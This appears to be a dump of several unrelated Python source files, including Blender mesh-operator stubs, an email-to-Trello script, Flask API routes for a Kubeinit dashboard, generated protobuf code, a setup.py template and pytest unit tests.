threshold: float = 0.0001):
'''Enforce symmetry (both form and topological) across an axis
:param direction: Direction, Which sides to copy from and to
:type direction: typing.Union[int, str]
:param threshold: Threshold, Limit for snap middle vertices to the axis center
:type threshold: float
'''
pass
def symmetry_snap(direction: typing.Union[int, str] = 'NEGATIVE_X',
threshold: float = 0.05,
factor: float = 0.5,
use_center: bool = True):
'''Snap vertex pairs to their mirrored locations
:param direction: Direction, Which sides to copy from and to
:type direction: typing.Union[int, str]
:param threshold: Threshold, Distance within which matching vertices are searched
:type threshold: float
:param factor: Factor, Mix factor of the locations of the vertices
:type factor: float
:param use_center: Center, Snap middle vertices to the axis center
:type use_center: bool
'''
pass
def tris_convert_to_quads(face_threshold: float = 0.698132,
shape_threshold: float = 0.698132,
uvs: bool = False,
vcols: bool = False,
seam: bool = False,
sharp: bool = False,
materials: bool = False):
'''Join triangles into quads
:param face_threshold: Max Face Angle, Face angle limit
:type face_threshold: float
:param shape_threshold: Max Shape Angle, Shape angle limit
:type shape_threshold: float
:param uvs: Compare UVs
:type uvs: bool
:param vcols: Compare VCols
:type vcols: bool
:param seam: Compare Seam
:type seam: bool
:param sharp: Compare Sharp
:type sharp: bool
:param materials: Compare Materials
:type materials: bool
'''
pass
def unsubdivide(iterations: int = 2):
'''UnSubdivide selected edges & faces
:param iterations: Iterations, Number of times to unsubdivide
:type iterations: int
'''
pass
def uv_texture_add():
'''Add UV Map
'''
pass
def uv_texture_remove():
'''Remove UV Map
'''
pass
def uvs_reverse():
'''Flip direction of UV coordinates inside faces
'''
pass
def uvs_rotate(use_ccw: bool = False):
'''Rotate UV coordinates inside faces
:param use_ccw: Counter Clockwise
:type use_ccw: bool
'''
pass
def vert_connect():
'''Connect selected vertices of faces, splitting the face
'''
pass
def vert_connect_concave():
'''Make all faces convex
'''
pass
def vert_connect_nonplanar(angle_limit: float = 0.0872665):
'''Split non-planar faces that exceed the angle threshold
:param angle_limit: Max Angle, Angle limit
:type angle_limit: float
'''
pass
def vert_connect_path():
'''Connect vertices by their selection order, creating edges, splitting faces
'''
pass
def vertex_color_add():
'''Add vertex color layer
'''
pass
def vertex_color_remove():
'''Remove vertex color layer
'''
pass
def vertices_smooth(factor: float = 0.5,
repeat: int = 1,
xaxis: bool = True,
yaxis: bool = True,
zaxis: bool = True):
'''Flatten angles of selected vertices
:param factor: Smoothing, Smoothing factor
:type factor: float
:param repeat: Repeat, Number of times to smooth the mesh
:type repeat: int
:param xaxis: X-Axis, Smooth along the X axis
:type xaxis: bool
:param yaxis: Y-Axis, Smooth along the Y axis
:type yaxis: bool
:param zaxis: Z-Axis, Smooth along the Z axis
:type zaxis: bool
'''
pass
def vertices_smooth_laplacian(repeat: int = 1,
lambda_factor: float = 1.0,
lambda_border: float = 5e-05,
use_x: bool = True,
use_y: bool = True,
use_z: bool = True,
preserve_volume: bool = True):
'''Laplacian smooth of selected vertices
:param repeat: Number of iterations to smooth the mesh
:type repeat: int
:param lambda_factor: Lambda factor
:type lambda_factor: float
:param lambda_border: Lambda factor in border
:type lambda_border: float
:param use_x: Smooth X Axis, Smooth object along X axis
:type use_x: bool
:param use_y: Smooth Y Axis, Smooth object along Y axis
:type use_y: bool
:param use_z: Smooth Z Axis, Smooth object along Z axis
:type use_z: bool
:param preserve_volume: Preserve Volume, Apply volume preservation after smooth
:type preserve_volume: bool
'''
pass
def wireframe(use_boundary: bool = True,
use_even_offset: bool = True,
use_relative_offset: bool = False,
use_replace: bool = True,
thickness: float = 0.01,
offset: float = 0.01,
use_crease: bool = False,
crease_weight: float = 0.01):
'''Create a solid wire-frame from faces
:param use_boundary: Boundary, Inset face boundaries
:type use_boundary: bool
:param use_even_offset: Offset Even, Scale the offset to give more even thickness
:type use_even_offset: bool
:param use_relative_offset: Offset Relative, Scale the offset by surrounding geometry
:type use_relative_offset: bool
:param use_replace: Replace, Remove original faces
:type use_replace: bool
:param thickness: Thickness
:type thickness: float
:param offset: Offset
:type offset: float
:param use_crease: Crease, Crease hub edges for improved subsurf
:type use_crease: bool
:param crease_weight: Crease weight
:type crease_weight: float
'''
pass
|
py | 1a304933cb80e62027c2631ddc0202f5385045a8 | from imbox import Imbox
import html2text
import requests
import json
import time
with open('config.json') as config_file:
data = json.load(config_file)
API_KEY = data['API_KEY']
OAUTH_TOKEN = data['OAUTH_TOKEN']
trello_list_id = data['trello_list_id']
# SSL Context docs https://docs.python.org/3/library/ssl.html#ssl.create_default_context
def get_text(content):
html = (str(content))
text_maker = html2text.HTML2Text()
text_maker.ignore_links = True
text_maker.bypass_tables = False
text = text_maker.handle(html)
# Slice everything that comes between html': and ]}
start = "html':"
end = "]}"
mail_content = text[text.find(start) + len(start):text.rfind(end)]
# Normalize content, removing unknown chars
mail_content = mail_content.replace("['","")
mail_content = mail_content.replace('\\xa0', ' ')
mail_content = mail_content.replace("\\r\\n'","")
return mail_content
def send_to_trello(mail_content,subject):
r = requests.post("https://api.trello.com/1/cards?key=" + \
API_KEY + "&token=" + OAUTH_TOKEN + \
"&name=" + subject + "&idList=" + \
trello_list_id + "&desc=" + \
mail_content)
return r
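# Editor's sketch (not part of the original script): the string-concatenated
# URL above does not URL-encode the subject or mail body, so characters such
# as '&' or '#' in a message would corrupt the query string. Assuming the same
# endpoint and credentials, an equivalent variant lets requests do the encoding:
def send_to_trello_encoded(mail_content, subject):
    # Same Trello "create card" endpoint, but values are passed via `params`
    # so requests URL-encodes them safely.
    return requests.post(
        "https://api.trello.com/1/cards",
        params={
            "key": API_KEY,
            "token": OAUTH_TOKEN,
            "name": subject,
            "idList": trello_list_id,
            "desc": mail_content,
        })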
with Imbox('imap.gmail.com',
username = data['mail_username'],
password = data['mail_password'],
ssl = True,
ssl_context = None,
starttls = False) as imbox:
fetch_mail_type = imbox.messages(sent_from = data['mail_from_username'])
# Get all folders
#status, folders_with_additional_info = imbox.folders()
# Gets all messages from the inbox
#all_inbox_messages = imbox.messages()
for uid, message in fetch_mail_type:
# Every message is an object with the following keys
origin = message.sent_from
receiver = message.sent_to
subject = message.subject
headers = message.headers
message_id = message.message_id
message_date = message.date
content = message.body
message_attachments = message.attachments
result = get_text(content)
response = send_to_trello(result,subject)
if response.status_code == 200:
#imbox.mark_seen(uid)
imbox.delete(uid)
time.sleep(1) |
py | 1a304b706f06264e84f92dd35e7e8243b8a98c9c | #!/usr/bin/env python
"""
Copyright 2019 Kubeinit (kubeinit.com).
Licensed under the Apache License, Version 2.0 (the "License"); you may
not use this file except in compliance with the License. You may obtain
a copy of the License at:
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
License for the specific language governing permissions and limitations
under the License.
"""
import app
from app import version as kubeinit_ui_version
from app.base import blueprint
from app.base.k8sclient import (cluster_name_configured,
state_namespaces,
state_nodes,
state_pods,
web_terminal)
from flask import jsonify, redirect, render_template, request, url_for
# , session
# from flask_login import (current_user,
# login_required,
# login_user,
# logout_user)
from google.cloud import firestore
from pystol.lister import list_actions, show_actions
KUBEINIT_VERSION = kubeinit_ui_version.__version__
#
# Begin authentication
#
try:
from app.auth.routes import get_session_data
# from app.auth.util import remote_cluster
except ImportError:
print("Module not available")
try:
fdb = firestore.Client()
transaction = fdb.transaction()
except Exception as e:
print("Cant connect to firestore: %s" % (e))
#
# End authentication
#
@blueprint.route('/error-<error>')
def route_errors(error):
"""
Define a route.
This is a main routing method
"""
#
# Basic authentication module requirement
    # If the auth module is installed and the user is not authenticated, redirect to login
#
session = {}
if hasattr(app, 'auth'):
try:
session = get_session_data(transaction=transaction, session_id=request.cookies.get('session_id'))
except Exception as e:
print(e)
return redirect(url_for('auth_blueprint.login'))
else:
session['kubeconfig'] = None
# not current_user.is_authenticated:
if hasattr(app, 'auth') and session['email'] is None:
return redirect(url_for('auth_blueprint.login'))
#
# End basic authentication requirement
#
return render_template('errors/{}.html'.format(error))
# API endpoints
@blueprint.route('/api/v1/ListActions', methods=['GET'])
def api_list_actions():
"""
Define a route.
This is a main routing method
"""
#
# Basic authentication module requirement
    # If the auth module is installed and the user is not authenticated, redirect to login
#
session = {}
if hasattr(app, 'auth'):
try:
session = get_session_data(transaction=transaction, session_id=request.cookies.get('session_id'))
except Exception as e:
print(e)
return redirect(url_for('auth_blueprint.login'))
else:
session['kubeconfig'] = None
# not current_user.is_authenticated:
if hasattr(app, 'auth') and session['email'] is None:
return redirect(url_for('auth_blueprint.login'))
#
# End basic authentication requirement
#
return jsonify(list_actions())
@blueprint.route('/api/v1/ShowActions', methods=['GET'])
def api_show_actions():
"""
Define a route.
This is a main routing method
"""
#
# Basic authentication module requirement
    # If the auth module is installed and the user is not authenticated, redirect to login
#
session = {}
if hasattr(app, 'auth'):
try:
session = get_session_data(transaction=transaction, session_id=request.cookies.get('session_id'))
except Exception as e:
print(e)
return redirect(url_for('auth_blueprint.login'))
else:
session['kubeconfig'] = None
# not current_user.is_authenticated:
if hasattr(app, 'auth') and session['email'] is None:
return redirect(url_for('auth_blueprint.login'))
#
# End basic authentication requirement
#
return jsonify(show_actions())
@blueprint.route('/api/v1/StateNamespaces', methods=['GET'])
def api_state_namespaces():
"""
Define a route.
This is a main routing method
"""
#
# Basic authentication module requirement
    # If the auth module is installed and the user is not authenticated, redirect to login
#
session = {}
if hasattr(app, 'auth'):
try:
session = get_session_data(transaction=transaction, session_id=request.cookies.get('session_id'))
except Exception as e:
print(e)
return redirect(url_for('auth_blueprint.login'))
else:
session['kubeconfig'] = None
# not current_user.is_authenticated:
if hasattr(app, 'auth') and session['email'] is None:
return redirect(url_for('auth_blueprint.login'))
#
# End basic authentication requirement
#
return jsonify(state_namespaces())
@blueprint.route('/api/v1/StateNodes', methods=['GET'])
def api_state_nodes():
"""
Define a route.
This is a main routing method
"""
#
# Basic authentication module requirement
    # If the auth module is installed and the user is not authenticated, redirect to login
#
session = {}
if hasattr(app, 'auth'):
try:
session = get_session_data(transaction=transaction, session_id=request.cookies.get('session_id'))
except Exception as e:
print(e)
return redirect(url_for('auth_blueprint.login'))
else:
session['kubeconfig'] = None
# not current_user.is_authenticated:
if hasattr(app, 'auth') and session['email'] is None:
return redirect(url_for('auth_blueprint.login'))
#
# End basic authentication requirement
#
return jsonify(state_nodes())
@blueprint.route('/api/v1/StatePods', methods=['GET'])
def api_state_pods():
"""
Define a route.
This is a main routing method
"""
#
# Basic authentication module requirement
    # If the auth module is installed and the user is not authenticated, redirect to login
#
session = {}
if hasattr(app, 'auth'):
try:
session = get_session_data(transaction=transaction, session_id=request.cookies.get('session_id'))
except Exception as e:
print(e)
return redirect(url_for('auth_blueprint.login'))
else:
session['kubeconfig'] = None
# not current_user.is_authenticated:
if hasattr(app, 'auth') and session['email'] is None:
return redirect(url_for('auth_blueprint.login'))
#
# End basic authentication requirement
#
return jsonify(state_pods())
@blueprint.route('/api/v1/Terminal', methods=['GET'])
def api_web_terminal():
"""
Define a route.
This is a main routing method
"""
#
# Basic authentication module requirement
    # If the auth module is installed and the user is not authenticated, redirect to login
#
session = {}
if hasattr(app, 'auth'):
try:
session = get_session_data(transaction=transaction, session_id=request.cookies.get('session_id'))
except Exception as e:
print(e)
return redirect(url_for('auth_blueprint.login'))
else:
session['kubeconfig'] = None
# not current_user.is_authenticated:
if hasattr(app, 'auth') and session['email'] is None:
return redirect(url_for('auth_blueprint.login'))
#
# End basic authentication requirement
#
return jsonify(web_terminal())
@blueprint.route('/api/v1/ClusterName', methods=['GET'])
def api_cluster_name_configured():
"""
Define a route.
This is a main routing method
"""
#
# Basic authentication module requirement
    # If the auth module is installed and the user is not authenticated, redirect to login
#
session = {}
if hasattr(app, 'auth'):
try:
session = get_session_data(transaction=transaction, session_id=request.cookies.get('session_id'))
except Exception as e:
print(e)
return redirect(url_for('auth_blueprint.login'))
else:
session['kubeconfig'] = None
# not current_user.is_authenticated:
if hasattr(app, 'auth') and session['email'] is None:
return redirect(url_for('auth_blueprint.login'))
#
# End basic authentication requirement
#
return jsonify(cluster_name_configured())
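# Editor's sketch (illustrative only, not wired into the routes above): every
# endpoint in this file repeats the same session/redirect boilerplate. Assuming
# the same get_session_data/transaction objects, the pattern could be factored
# into a decorator such as this one.
def _require_session(view):
    """Run a view only when a session can be resolved, else redirect to login."""
    import functools
    @functools.wraps(view)
    def wrapper(*args, **kwargs):
        session = {}
        if hasattr(app, 'auth'):
            try:
                session = get_session_data(
                    transaction=transaction,
                    session_id=request.cookies.get('session_id'))
            except Exception as e:
                print(e)
                return redirect(url_for('auth_blueprint.login'))
        else:
            session['kubeconfig'] = None
        if hasattr(app, 'auth') and session.get('email') is None:
            return redirect(url_for('auth_blueprint.login'))
        return view(*args, **kwargs)
    return wrapper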
@blueprint.route('/shutdown')
def shutdown():
"""
Define a route.
This is a main routing method
"""
func = request.environ.get('werkzeug.server.shutdown')
if func is None:
raise RuntimeError('Not running with the Werkzeug Server')
func()
return 'Server shutting down...'
@blueprint.errorhandler(404)
def not_found_error(error):
"""
Define a route.
This is a main routing method
"""
return render_template('page-404.html',
template_folder="../home/templates/"), 404
@blueprint.errorhandler(500)
def internal_error(error):
"""
Define a route.
This is a main routing method
"""
return render_template('page-500.html',
template_folder="../home/templates/"), 500
# Errors
# @login_manager.unauthorized_handler
# def unauthorized_handler():
# """
# Define a route.
#
# This is a main routing method
# """
# return render_template('page-403.html',
# template_folder="../home/templates/"), 403
# @blueprint.errorhandler(403)
# def access_forbidden(error):
# """
# Define a route.
#
# This is a main routing method
# """
# return render_template('page-403.html',
# template_folder="../home/templates/"), 403
|
py | 1a304b8753c7704f6723bc771a077928405b2e89 | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: communicator_objects/brain_type_proto.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf.internal import enum_type_wrapper
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
#from communicator_objects import resolution_proto_pb2 as communicator__objects_dot_resolution__proto__pb2
import resolution_proto_pb2 as communicator__objects_dot_resolution__proto__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='communicator_objects/brain_type_proto.proto',
package='communicator_objects',
syntax='proto3',
serialized_pb=_b('\n+communicator_objects/brain_type_proto.proto\x12\x14\x63ommunicator_objects\x1a+communicator_objects/resolution_proto.proto*G\n\x0e\x42rainTypeProto\x12\n\n\x06Player\x10\x00\x12\r\n\tHeuristic\x10\x01\x12\x0c\n\x08\x45xternal\x10\x02\x12\x0c\n\x08Internal\x10\x03\x42\x1f\xaa\x02\x1cMLAgents.CommunicatorObjectsb\x06proto3')
,
dependencies=[communicator__objects_dot_resolution__proto__pb2.DESCRIPTOR,])
_BRAINTYPEPROTO = _descriptor.EnumDescriptor(
name='BrainTypeProto',
full_name='communicator_objects.BrainTypeProto',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='Player', index=0, number=0,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Heuristic', index=1, number=1,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='External', index=2, number=2,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Internal', index=3, number=3,
options=None,
type=None),
],
containing_type=None,
options=None,
serialized_start=114,
serialized_end=185,
)
_sym_db.RegisterEnumDescriptor(_BRAINTYPEPROTO)
BrainTypeProto = enum_type_wrapper.EnumTypeWrapper(_BRAINTYPEPROTO)
Player = 0
Heuristic = 1
External = 2
Internal = 3
DESCRIPTOR.enum_types_by_name['BrainTypeProto'] = _BRAINTYPEPROTO
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
DESCRIPTOR.has_options = True
DESCRIPTOR._options = _descriptor._ParseOptions(descriptor_pb2.FileOptions(), _b('\252\002\034MLAgents.CommunicatorObjects'))
# @@protoc_insertion_point(module_scope)
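# Editor's note (illustrative): the EnumTypeWrapper above provides the usual
# protobuf enum helpers, e.g.
#   BrainTypeProto.Name(2)          -> 'External'
#   BrainTypeProto.Value('Player')  -> 0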
|
py | 1a304bb060903a5cd94b0ffd2af2c9cfbca5e79b | import pylab
class Animal:
def __init__(self, name, egg_laying, scales, poisonous, cold_blood, legs, reptile):
self.name = name
self.egg_laying = egg_laying
self.scales = scales
self.poisonous = poisonous
self.legs = legs
self.cold_blood = cold_blood
self.reptile = reptile
def get_name(self):
return self.name
def distance(self, another_animal):
distance = 0
if self.egg_laying != another_animal.egg_laying:
distance += 1
if self.scales != another_animal.scales:
distance += 1
if self.poisonous != another_animal.poisonous:
distance += 1
if self.legs != another_animal.legs:
distance += 1
if self.cold_blood != another_animal.cold_blood:
distance += 1
if self.reptile != another_animal.reptile:
distance += 1
return distance
def __str__(self):
return self.name
def std_dev(l):
    # Standard deviation of a sequence of numeric values. z_scale_features
    # below passes an array of floats, so the elements are used directly
    # (calling len() on a float would raise a TypeError).
    if len(l) == 0:
        return float('NaN')
    summ = 0
    for i in l:
        summ += i
    mean = summ / float(len(l))
    tot = 0.0
    for i in l:
        tot += (i - mean) ** 2
    std = (tot / len(l)) ** 0.5
    return std
def z_scale_features(vals):
result = pylab.array(vals)
mean = float(sum(vals)) / len(vals)
result = result - mean
return result / std_dev(result)
def i_scale_features(vals):
min_vals, max_vals = min(vals), max(vals)
fit = pylab.polyfit([min_vals, max_vals], [0, 1], 1)
return pylab.polyval(fit, vals)
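# Editor's note: the two helpers above are alternative feature-scaling schemes;
# illustratively, z_scale_features([1.0, 2.0, 3.0]) has mean 0 and unit standard
# deviation, while i_scale_features([1.0, 2.0, 3.0]) maps the values linearly
# onto [0, 1]. Neither is used by the distance_matrix() call at the bottom of
# this file.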
animals = [Animal('cobra', 1, 1, 1, 1, 0, 1),
Animal('rattlesnake', 1, 1, 1, 1, 0, 1),
Animal('boa constrictor', 0, 1, 0, 1, 0, 1),
Animal('chicken', 1, 1, 0, 1, 2, 0),
Animal('guppy', 0, 1, 0, 0, 0, 0),
Animal('dart frog', 1, 0, 1, 0, 4, 0),
Animal('zebra', 0, 0, 0, 0, 4, 0),
Animal('python', 1, 1, 0, 1, 0, 1),
Animal('alligator', 1, 1, 0, 1, 4, 1)]
def distance_matrix(animals, precision):
column_label = []
for a in animals:
column_label.append(a.get_name())
row_label = column_label[:]
table_vals = []
# Get distance between pairs of animals
for a1 in animals:
row = []
for a2 in animals:
if a1 == a2:
row.append('--')
else:
distance = a1.distance(a2)
row.append(str(round(distance, precision)))
table_vals.append(row)
table = pylab.table(rowLabels=row_label,
colLabels=column_label,
cellText=table_vals,
cellLoc='center',
loc='center',
colWidths=[0.138] * len(animals))
table.scale(1, 2.5)
pylab.axis('off')
pylab.savefig('distance')
distance_matrix(animals, 3)
|
py | 1a304c94f9d33523058aa89133e995522e180368 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Note: To use the 'upload' functionality of this file, you must:
# $ pipenv install twine --dev
import io
import os
import sys
from shutil import rmtree
from setuptools import find_packages, setup, Command
# Package meta-data.
NAME = 'mypackage'
DESCRIPTION = 'My short description for my project.'
URL = 'https://github.com/me/myproject'
EMAIL = '[email protected]'
AUTHOR = 'Awesome Soul'
REQUIRES_PYTHON = '>=3.8.0'
VERSION = '0.1.0'
# What packages are required for this module to be executed?
REQUIRED = [
# 'requests', 'maya', 'records',
]
# What packages are optional?
EXTRAS = {
# 'fancy feature': ['django'],
}
# The rest you shouldn't have to touch too much :)
# ------------------------------------------------
# Except, perhaps the License and Trove Classifiers!
# If you do change the License, remember to change the Trove Classifier for that!
here = os.path.abspath(os.path.dirname(__file__))
# Import the README and use it as the long-description.
# Note: this will only work if 'README.md' is present in your MANIFEST.in file!
try:
with io.open(os.path.join(here, 'README.md'), encoding='utf-8') as f:
long_description = '\n' + f.read()
except FileNotFoundError:
long_description = DESCRIPTION
# Load the package's __version__.py module as a dictionary.
about = {}
if not VERSION:
project_slug = NAME.lower().replace("-", "_").replace(" ", "_")
with open(os.path.join(here, project_slug, '__version__.py')) as f:
exec(f.read(), about)
else:
about['__version__'] = VERSION
class UploadCommand(Command):
"""Support setup.py upload."""
description = 'Build and publish the package.'
user_options = []
@staticmethod
def status(s):
"""Prints things in bold."""
print('\033[1m{0}\033[0m'.format(s))
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
try:
self.status('Removing previous builds…')
rmtree(os.path.join(here, 'dist'))
except OSError:
pass
self.status('Building Source and Wheel (universal) distribution…')
os.system('{0} setup.py sdist bdist_wheel --universal'.format(sys.executable))
self.status('Uploading the package to PyPI via Twine…')
os.system('twine upload dist/*')
self.status('Pushing git tags…')
os.system('git tag v{0}'.format(about['__version__']))
os.system('git push --tags')
sys.exit()
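# Editor's note: with the cmdclass registration at the bottom of this file the
# command above is invoked as
#   $ python setup.py upload
# which builds the sdist/wheel, uploads them with twine, then pushes a git tag.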
# Where the magic happens:
setup(
name=NAME,
version=about['__version__'],
description=DESCRIPTION,
long_description=long_description,
long_description_content_type='text/markdown',
author=AUTHOR,
author_email=EMAIL,
python_requires=REQUIRES_PYTHON,
url=URL,
packages=find_packages(exclude=["tests", "*.tests", "*.tests.*", "tests.*"]),
# If your package is a single module, use this instead of 'packages':
# py_modules=['mypackage'],
# entry_points={
# 'console_scripts': ['mycli=mymodule:cli'],
# },
install_requires=REQUIRED,
extras_require=EXTRAS,
include_package_data=True,
license='MIT',
classifiers=[
# Trove classifiers
# Full list: https://pypi.python.org/pypi?%3Aaction=list_classifiers
'License :: OSI Approved :: MIT License',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: Implementation :: CPython',
'Programming Language :: Python :: Implementation :: PyPy'
],
# $ setup.py publish support.
cmdclass={
'upload': UploadCommand,
},
)
|
py | 1a304d958c1bf8226f9dfa8a1c718239de92b0d2 | class ResampleQuality:
r"""Quality levels for resampling."""
QUICK = 'q'
LOW = 'l'
MEDIUM = 'm'
HIGH = 'h'
VERY_HIGH = 'v'
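# Editor's note (assumption): these one-letter codes mirror the quality flags of
# SoX's `rate` effect ('q' quick ... 'v' very high), so a caller would typically
# pass e.g. ResampleQuality.VERY_HIGH wherever a resampling-quality string is
# expected (as in pysox's Transformer.rate(16000, quality='v')).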
|
py | 1a304d961a3e03a6460d3f21abd9d9ba9cbc8ecf | #!/usr/bin/env python3
import pytest # type: ignore
import os
import time
import random
import pathlib
import numpy as np # type: ignore
import numpy
from glob import iglob
from pathlib import Path
import rtCommon.utils as utils # type: ignore
import rtCommon.projectUtils as putils # type: ignore
import rtCommon.validationUtils as vutils # type: ignore
from rtCommon.structDict import MatlabStructDict # type: ignore
from rtCommon.addLogin import addUserPassword
from rtCommon.webHttpHandlers import loadPasswdFile
@pytest.fixture(scope="module")
def matTestFilename(): # type: ignore
return os.path.join(os.path.dirname(__file__), 'test_input/teststruct.mat')
class TestFindNewestFile:
TEST_BASE_FILENAME = '/tmp/testdir/file1_20170101T01010'
NUM_TEST_FILES = 5
def setup_class(cls):
# create tmp directory if it doesn't exist
pathlib.Path('/tmp/testdir/').mkdir(parents=True, exist_ok=True)
# check if test files already exist, get the count of them
count_testfiles = sum(1 for _ in iglob(TestFindNewestFile.TEST_BASE_FILENAME + "*"))
if count_testfiles != TestFindNewestFile.NUM_TEST_FILES:
# remove any existing testfiles
for filename in iglob(TestFindNewestFile.TEST_BASE_FILENAME + "*"):
os.remove(filename)
# create the correct number of test files
for i in range(TestFindNewestFile.NUM_TEST_FILES):
filename = TestFindNewestFile.TEST_BASE_FILENAME + str(i)
with open(filename, 'w') as fp:
fp.write("test file")
time.sleep(1)
def assert_result_matches_filename(self, filename):
assert filename == (self.TEST_BASE_FILENAME + str(self.NUM_TEST_FILES - 1))
def test_normalCase(self):
print("Test findNewestFile normal case:")
filename = utils.findNewestFile('/tmp/testdir', 'file1_20170101*')
self.assert_result_matches_filename(filename)
def test_emptyPath(self):
print("Test findNewestFile empty path:")
filename = utils.findNewestFile('', '/tmp/testdir/file1_20170101*')
self.assert_result_matches_filename(filename)
def test_pathInPattern(self):
print("Test findNewestFile path embedded in pattern:")
filename = utils.findNewestFile(
'/tmp/testdir', '/tmp/testdir/file1_20170101*')
self.assert_result_matches_filename(filename)
def test_pathPartiallyInPattern(self):
print("Test findNewestFile path partially in pattern:")
filename = utils.findNewestFile('/tmp', 'testdir/file1_20170101*')
self.assert_result_matches_filename(filename)
def test_noMatchingFiles(self):
print("Test findNewestFile no matching files:")
filename = utils.findNewestFile('/tmp/testdir/', 'no_such_file')
assert filename is None
class TestCompareArrays:
A = None
B = None
max_deviation = .01
def setup_class(cls):
arrayDims = [40, 50, 60]
A = np.random.random(arrayDims)
delta = np.random.random(arrayDims) * TestCompareArrays.max_deviation
B = A + (A * delta)
TestCompareArrays.A = A
TestCompareArrays.B = B
def test_compareArrays(self):
print("Test compareArrays")
# import pdb; pdb.set_trace()
result = vutils.compareArrays(self.B, self.A)
assert result['mean'] < 2 / 3 * self.max_deviation
assert result['max'] < self.max_deviation
return
def test_areArraysClose(self):
print("Test areArraysClose")
max_mean = 2 / 3 * self.max_deviation
assert vutils.areArraysClose(self.B, self.A, mean_limit=max_mean)
return
class TestCompareMatStructs:
A = None
B = None
max_deviation = .01
def setup_class(cls):
def delta(val):
return val + (val * random.random() * TestCompareMatStructs.max_deviation)
A = MatlabStructDict(
{'sub': MatlabStructDict({})}, 'sub')
A.str1 = "hello"
A.a1 = 6.0
        A.sub.a2 = np.array([1, 2, 3, 4, 5], dtype=np.float64)  # np.float is a deprecated alias of float64
A.sub.b2 = 7.0
A.sub.str2 = "world"
B = MatlabStructDict(
{'sub': MatlabStructDict({})}, 'sub')
B.str1 = "hello"
B.a1 = delta(A.a1)
B.sub.a2 = delta(A.a2)
B.sub.b2 = delta(A.b2)
B.sub.str2 = "world"
TestCompareMatStructs.A = A
TestCompareMatStructs.B = B
def test_compareMatStructs_all_fields(self):
print("Test compareMatStructs_all_fields")
result = vutils.compareMatStructs(self.A, self.B)
means = [result[key]['mean'] for key in result.keys()]
assert len(means) == 5
assert all(mean < self.max_deviation for mean in means)
def test_compareMatStructs_field_subset(self):
print("Test compareMatStructs_field_subset")
result = vutils.compareMatStructs(self.A, self.B, ['a2', 'str1'])
means = [result[key]['mean'] for key in result.keys()]
assert len(means) == 2
assert all(mean < self.max_deviation for mean in means)
def test_isMeanWithinThreshold(self):
a = {'val1': {'mean': .1, 'max': .2},
'val2': {'mean': .05, 'max': .075}}
assert vutils.isMeanWithinThreshold(a, .11)
assert not vutils.isMeanWithinThreshold(a, .09)
class TestValidationUtils:
def test_compareMatFiles(self, matTestFilename):
res = vutils.compareMatFiles(matTestFilename, matTestFilename)
assert vutils.isMeanWithinThreshold(res, 0)
def test_pearsonsMeanCorr(self):
n1 = np.array([[1, 2, 3, 4, 5],
[np.nan, np.nan, np.nan, np.nan, np.nan]])
n2 = np.array([[1.1, 2.1, 3.2, 4.1, 5.05],
[np.nan, np.nan, np.nan, np.nan, np.nan]])
n1t = np.transpose(n1)
n2t = np.transpose(n2)
res = vutils.pearsons_mean_corr(n1t, n2t)
assert res > 0.999
class TestUtils:
def test_delete(self):
fileList = ['/tmp/testdir/d1/test1.txt', '/tmp/testdir/d1/d2/test2.txt',
'/tmp/testdir/d1/d2/d3/test3.txt', '/tmp/testdir/d1/d2/d3/test4.txt']
for file in fileList:
utils.writeFile(file, 'hello', binary=False)
# test delete files from list
assert os.path.exists(fileList[-1])
utils.deleteFilesFromList(fileList)
assert not os.path.exists(fileList[-1])
assert os.path.isdir('/tmp/testdir/d1/d2/d3')
# test delete folder
for file in fileList:
utils.writeFile(file, 'hello', binary=False)
utils.deleteFolder('/tmp/testdir/d1')
assert not os.path.isdir('/tmp/testdir/d1')
# test delete files recursively in folders, but leave folders in place
for file in fileList:
utils.writeFile(file, 'hello', binary=False)
utils.deleteFolderFiles('/tmp/testdir/d1')
assert os.path.isdir('/tmp/testdir/d1/d2/d3')
class TestAddUser:
def test_adduser(self):
testPasswordFile = '/tmp/testdir/test_pwd_file'
# start with empty file
if os.path.exists(testPasswordFile):
os.remove(testPasswordFile)
addUserPassword('a_user', 'a_password', testPasswordFile, retypePasswd=False)
addUserPassword('b_user', 'b_password', testPasswordFile, retypePasswd=False)
pwds = loadPasswdFile(testPasswordFile)
assert 'a_user' in pwds
assert 'b_user' in pwds
class TestProjectUtils:
def test_npToPy(self):
data1 = {'subject': '04', 'task': 'story', 'suffix': 'bold', 'datatype': 'func', 'run': 1}
data2 = {'a1': (1, 'two', 3.0),
'a2': {'np': numpy.float32(3), 'pyint': 4, 'str': 'five'},
'a3': [6.0, 'seven', numpy.int(8), {'a', numpy.float32(5), 'c'}]}
data2_py = {'a1': (1, 'two', 3.0),
'a2': {'np': 3.0, 'pyint': 4, 'str': 'five'},
'a3': [6.0, 'seven', 8.0, {'a', 5.0, 'c'}]}
kwargs = {'mdata': data2, 'test1': 9.0, 'test2': numpy.float32(9), 'test3': 'yes'}
kwargs_py = {'mdata': data2_py, 'test1': 9.0, 'test2': 9.0, 'test3': 'yes'}
args = (4, 'hello', data1, kwargs)
args_py = (4, 'hello', data1, kwargs_py)
res = putils.npToPy(args)
assert res == args_py
if __name__ == "__main__":
print("PYTEST MAIN:")
pytest.main()
|
py | 1a304e1024ad069dcf72a7729caa76ee2217ce61 | # coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
